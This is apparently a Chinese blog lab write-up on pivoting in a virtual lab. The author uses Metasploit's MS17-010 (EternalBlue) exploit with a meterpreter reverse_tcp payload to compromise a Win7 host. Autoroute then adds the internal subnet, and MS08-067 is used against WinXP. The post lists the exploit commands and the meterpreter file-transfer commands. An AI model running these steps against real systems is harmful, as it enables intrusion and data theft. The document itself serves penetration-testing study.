跨网段攻击
文章目錄
- 1、實驗內容
- 2、實驗準備
- 3、滲透攻擊環節
- 3.1kali通過永恒之藍ms17-010攻擊win7
- 3.2 shell模塊進行遠程登錄
- 4、跨網段攻擊 kali——>winxp
1、實驗內容
??????模擬使用kali作為攻擊機通過外網滲透win7,并把win7作為跳板,攻擊內網中的winxp
2、實驗準備
靶機:win7(雙網卡):192.168.44.164(NAT)+10.10.10.129(僅主機模式)
? ?????????winxpsp3:10.10.10.128(僅主機模式)
攻擊機:kali:192.168.44.165(NAT)
實驗開始前,需要配置所需的環境:
?????1.這里kali使用NAT模式,作為外網的攻擊機,通過ifconfig獲取IP地址。
?????2. 配置內網:在VM虛擬機中新建一個虛擬網段Vmnet2,并設置為僅主機模式:
win7虛擬機作為kali的攻擊跳板,需要設置兩個虛擬網卡,其中一個設置為剛剛設置為僅主機模式:
然后將目標機winxp也設置在同一網段:
這里實驗所需要的環境就算配置完成了。
3、滲透攻擊環節
這個實驗的重點是跨網段攻擊,所以就前面的滲透攻擊win7不做過多的演示:
3.1kali通過永恒之藍ms17-010攻擊win7
● search ms17-010 //通過nmap掃描到445端口,搜索ms17-010這個漏洞相關的腳本
● use 0 //使用攻擊腳本 //kali系統里面在/usr/share/metasploit-framework/modules/目錄下能看具體載荷的代碼,后邊根據具體腳本而定
● set rhost ip地址 // 設置目標的IP地址、我們需要攻擊的地址
● set lhost ip地址 //kali的IP地址
● set payload windows/x64/meterpreter/reverse_tcp // 設置基于TCP反向連接的攻擊載荷
● run //執行攻擊
可以看到我們已經攻擊成功了。這里可以使用一些命令:
1、screenshot(獲取屏幕快照)
2、上傳文件到Windows主機:upload /root/csb666.jpg c://csb666.jpg
3、從Windows主機中下載文件到kali中:download d:/meishaonv.jpg /root
3.2 shell模塊進行遠程登錄
首先我們可以查看它的IP:
如果查看的結果是亂碼,輸入chcp 65001就可以顯示正常。我們可以發現,win7這臺機器有兩個網卡,發現還有一個10.10.10.x的網段,那我們可以查看是否存在其他ip:
arp -a參數的含義就是通過詢問當前協議數據,顯示當前 ARP 項。如果指定 inet_addr,則只顯示指定計算機的 IP 地址和物理地址。如果不止一個網絡接口使用 ARP,則顯示每個 ARP 表的項。可以在命令窗口輸入arp /?查看具體說明。
我們可以看到在內網中還有一個ip,這個就是要攻擊的winxp,通過win7給攻擊機kali分配一個網段(將內網段添加到路由):
查看路由映射情況:run autoroute -p
這個時候已經實現了給kali分配一個ip,使得kali可以和winxp進行連接。然后就可以對winxp進行滲透攻擊。
4、跨網段攻擊 kali——>winxp
使用ms08-067對winxp進行攻擊,同kali攻擊win7一樣:
這里需要注意的是payload只能正向連接,因為winxp是ping不同kali,而kali能ping同winxp。整個跨網段攻擊就是這樣,這里面通過kali對win7和winxp都挺容易,只需要用已發現的漏洞進行滲透測試,主要是將內網段添加至路由表對于小白來說很陌生。這個實驗主要分享學習心得,體會攻擊的過程所以不會涉及太多NB的操作。
總結
- 上一篇: 游戏策划的excel配置表转成json文
- 下一篇: lucene的建立索引,搜索,中文分词